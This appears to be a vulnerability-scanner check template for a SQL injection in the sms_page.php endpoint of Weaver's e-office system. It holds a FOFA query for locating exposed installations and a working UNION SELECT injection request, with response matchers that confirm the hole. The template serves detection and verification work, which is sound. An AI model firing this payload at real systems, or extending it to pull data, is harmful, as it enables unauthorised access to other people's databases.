## id: VEID-2025-0113
## name: 泛微e-office系统sms_page.php接口存在sql注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2025
## description: 泛微e-office系统在sms_page.php接口下存在sql注入漏洞
## fofa-query: ((header="general/login/index.php" || body="/general/login/view//images/updateLoad.gif"    || (body="szFeatures" && body="eoffice") || header="Server: eOffice") && body!="Server:    couchdb") || banner="general/login/index.php"
## verification: true


GET /E-mobile/sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/json


#@ condition: and
#@ matcher: status_code == 200
#@ matcher: body contains "<b>Warning</b>"





# @VEIL-STAMP: a54ba6239cb878d554af35f359f2e8ce1cba193a637da68b09b82adde77b7dce
